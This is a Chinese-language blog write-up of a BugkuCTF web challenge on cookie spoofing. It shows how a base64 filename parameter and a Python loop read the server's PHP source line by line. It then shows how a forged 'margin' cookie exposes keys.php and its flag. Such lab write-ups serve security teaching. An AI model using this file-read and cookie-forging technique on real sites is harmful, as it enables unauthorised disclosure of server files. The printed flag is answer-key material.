bugkuctf-web-cookies欺骗

最新推荐文章于 2021-08-10 21:32:29 发布
最新推荐文章于 2021-08-10 21:32:29 发布
阅读量391 收藏
点赞数
分类专栏: CTF 文章标签: bugkuctf web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Ahuuua/article/details/111317040
版权

看那一堆重复的串什么也不是

记得看url,url里也可能隐藏信息 a2V5cy50eHQ= 像base64 转化后:keys.txt

说明一进来访问的是web11/index.php?line=&filename=keys.txt

改一下line=&filename=index.php  

 转base64     line=&filename=aW5kZXgucGhw

查看源代码得到第0行

view-source:http://123.206.87.240:8002/web11/index.php?filename=aW5kZXgucGhw

?line=1&filename=aW5kZXgucGhw

line=1的到第一行。。。。。把所有的代码拿出来

写个脚本拿

import requests

a=30

for i in range(a):

    url="http://123.206.87.240:8002/web11/index.php?line="+str(i)+"&filename=aW5kZXgucGhw"

    s=requests.get(url)

    print (s.text)

<?php

error_reporting(0);

$file=base64_decode(isset($_GET['filename'])?$_GET['filename']:"");

$line=isset($_GET['line'])?intval($_GET['line']):0;

if($file=='') header("location:index.php?line=&filename=a2V5cy50eHQ=");

$file_list = array(

'0' =>'keys.txt',

'1' =>'index.php',

);

if(isset($_COOKIE['margin']) && $_COOKIE['margin']=='margin'){

$file_list[2]='keys.php';

}

if(in_array($file, $file_list)){

$fa = file($file);//整个$file文件读入一个数组中

echo $fa[$line];

}

?>

如果if(isset($_COOKIE['margin']) && $_COOKIE['margin']=='margin')

file_list会多出来一个keys.php文件,同时要得到keys.php文件内容还需要使$file=keys.php

即:

1.需要$file=keys.php从php代码中可以看出来,我们需要将keys.php这段字符串Base64加密

a2V5cy5waHA=  然后将其作为filename的值

2.还要构造Cookie: margin=margin这个Cookie头

学会需改Cookie的方法

KEY{key_keys}

 

Ahuuua
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
Bugku-Web-cookie欺骗.docx
05-16
Bugku-Web-cookie欺骗 看到url上的参数有base64,解码发现是key.txt 把改参数换成index.php,观察发现line按行返回 所以自己练练手写了个脚本跑出来
BugkuCTF cookies欺骗
3tu6b0rn的博客
05-14 605
页面中乱码 源代码也没有 只有url中有一串类似于base64 说明本网页可能访问的是keys.txt,将filename换为index.phh base64加密aW5kZXgucGhw 改变line即可得到代码 要么写脚本 那么就只能自己一行一行的试了 import requests a=30 for i in range(a): url="http://120.24.86....
[CTF]Bugku cookies欺骗
第八个男人
08-10 291
https://ctf.bugku.com/challenges/detail/id/87.html 打开网页是一串乱码,源代码也是乱码,查看Response也没有特别信息,题目提到的cookie里面也是空内容。 从题目的链接入手,http://114.67.246.176:14576/index.php?line=&filename=a2V5cy50eHQ= filename后面带的这串经过base64解密后是keys.txt,所以这一段就是可以修改的,我们把这串改成题目中的网页index.
Bugku----cookies欺骗writeup
a1004070060的博客
06-02 625
解题链接:http://123.206.87.240:8002/web11/index.php?line=&filename=a2V5cy50eHQ= 一、题目打开是一串毫无意义的字符串,抓包也发现不了任何有价值的信息 二、尝试把参数filename的值解码得到真实文件名为keys.txt。 三、根据line和filename两个参数猜测网页显示的可能是filename...
BugkuCTF-web
Mccc_li的博客
04-05 429
args=GLOBALS GLOBAS:全局变量,然后var_dump打印出全部的变量的内容
web-ctf-help:脚本集,以帮助基于Web的ctfs
02-24
用法usage: webctf [-h] [-v] [--comments] [--scripts] [--images] [--headers] [--cookies COOKIES] [--flags FLAGS] [-f] urlpositional arguments: url URL of the target websiteoptional arguments: -h, --...
js-cookies:JavaScript Cookies API库
05-08
JavaScript Cookies 使用Cookies类在网页中创建Cookies 。 安装 直接安装 有关如何在浏览器中加载脚本的示例: < script type =" text/javascript " src =" /path/to/Cookies.js " > </ script > 要求...
awesome-web-storage:您需要了解的有关客户端存储的所有信息
02-02
awesome-web-storage:您需要了解的有关客户端存储的所有信息
react-native-cookies:React Native的Cookie管理器
02-04
安装yarn add react-native-cookies连结中自动(推荐) react-native link react-native-cookies手册如果自动链接不起作用,则可以按照以下说明手动链接此库:的iOS 在Xcode中打开您的项目,右键单击“ Libraries ,...
CTF密码学——常见编解码及加解密总结
热门推荐
Ahuuua的博客
10-20 2万+
目录 编码 进制表示 ASCII码对照表 unicode编码 URL编码 Escape/Unescape Base64 Base32对照表 Base16 Base91 XXencode编码 UUencode编码 aaencode编码 ROT5/13/18/47编码 jother编码 密码 栅栏密码 仿射密码 morse莫尔斯电码 RSA Ploybius 棋盘密码 波利比奥斯方阵 普莱费尔密码 Playfair 维吉尼亚密码 曼彻斯特编码 培根密码 jsf
中国蚁剑安装步骤(win10 64) 报错:解压代码出错:[object Object]
Ahuuua的博客
10-12 2万+
安装中国蚁剑时,选择工作目录后,出现解压代码出错问题 这个问题就是安装步骤不正确,我是新建了一个文件夹作为蚁剑的工作目录,才出现了这个问题。 但是选什么文件夹呢,应该选择antSword-master.zip加压后的文件呀,这样才能正确的安装。 首先蚁剑的下载地址: https://github.com/AntSwordProject/antSword 其次需要注意: 在GitHub下载时需要下载两个部分: 一个是项目核心源码(AntSword),另一个是加载器(AntSword-L.
文件头文件尾全面总结
Ahuuua的博客
10-19 1万+
文件头文件尾汇总: 文件类型 文件头 文件尾 特征 JPEG (jpg) FFD8FF FF D9 ÿØÿà PNG (png) 89504E47 AE 42 60 82 .PNG... GIF (gif) 474...
Buuctf RSA 题目总结
Ahuuua的博客
10-20 7318
1.RSA 题目: 在一次RSA密钥对生成中,假设p=473398607161,q=4511491,e=17 求解出d作为flga提交 首先: 学习RSAtool2的使用: 1.Number Base 设置为十进制 2.注意:Public Exponent这里要使用16进制的数,如果公钥e=17的话,就应该填入十六进制的11 3.给出p,q,e的话直接填入,再点击Calc.D,获得d 4.给出的是n和e的话,输入n和e,点击Factor N(分解),得到p,q,再重复第3步就能得到d了
burpSuite之安装+配置代理+安装证书抓取https
Ahuuua的博客
09-15 1998
1.安装用的破解版,解压直接可以用 2.打开BurpSutie配置代理 使用默认的127.0.0.1:8080就好 编辑完记得Running打勾✔ 3.配置浏览器代理安装证书 对火狐浏览器配置代理及安装证书: >设置->搜索代理->设置代理 安装证书: >设置->搜索证书->查看证书->导入 点击导入 最后: 对谷歌浏览器配置代理及安装证书: 先对谷歌代理进行了配置,设置->高级->打开..
BugKuCTF 一段base64 各步骤详解 适合初学者
Ahuuua的博客
09-29 1853
预备知识补充(不想看的话直接看下面解题步骤): 1. escape采用ISO Latin字符集对指定的字符串进行编码。 所有的空格符、标点符号、特殊字符以及其他非ASCII字符都将被转化成%xx格式的字符编码(xx等于该字符在字符集表里面的编码的16进制数字)。 使用escape、unescape <script> var str="Need tips? Visit RUNOOB!"; var str_esc=escape(str); document.write(str_esc
bugkuctf 王晓明的日记
Ahuuua的博客
10-29 488
王晓明的日记 百度搜索字典在线生成器可找到: https://www.bugku.com/mima/ 注意是www,不是ctf: https://ctf.bugku.com/mima/ 进入后下滑如图: 提交后生成字典,复制下来保存。 打开burpsuite
node-v8.15.0-linux-s390x.tar.xz
最新发布
05-06
Node.js,简称Node,是一个开源且跨平台的JavaScript运行时环境,它允许在浏览器外运行JavaScript代码。Node.js于2009年由Ryan Dahl创立,旨在创建高性能的Web服务器和网络应用程序。它基于Google Chrome的V8 JavaScript引擎,可以在Windows、Linux、Unix、Mac OS X等操作系统上运行。 Node.js的特点之一是事件驱动和非阻塞I/O模型,这使得它非常适合处理大量并发连接,从而在构建实时应用程序如在线游戏、聊天应用以及实时通讯服务时表现卓越。此外,Node.js使用了模块化的架构,通过npm(Node package manager,Node包管理器),社区成员可以共享和复用代码,极大地促进了Node.js生态系统的发展和扩张。 Node.js不仅用于服务器端开发。随着技术的发展,它也被用于构建工具链、开发桌面应用程序、物联网设备等。Node.js能够处理文件系统、操作数据库、处理网络请求等,因此,开发者可以用JavaScript编写全栈应用程序,这一点大大提高了开发效率和便捷性。 在实践中,许多大型企业和组织已经采用Node.js作为其Web应用程序的开发平台,如Netflix、PayPal和Walmart等。它们利用Node.js提高了应用性能,简化了开发流程,并且能更快地响应市场需求。
Java基础知识总结(超详细整理).txt
05-06
Java基础知识总结(超详细整理)
ctfshow-web-web红包题
07-14
ctfshow-web-web红包题是一道CTF比赛中的网络安全题目。这道题目的背景是一个在线购物网站,要求我们通过安全漏洞来获得网站的红包。 首先,我们可以检查网站的源代码,寻找可能存在的漏洞。在网站的前端页面中,...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Ahuuua

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值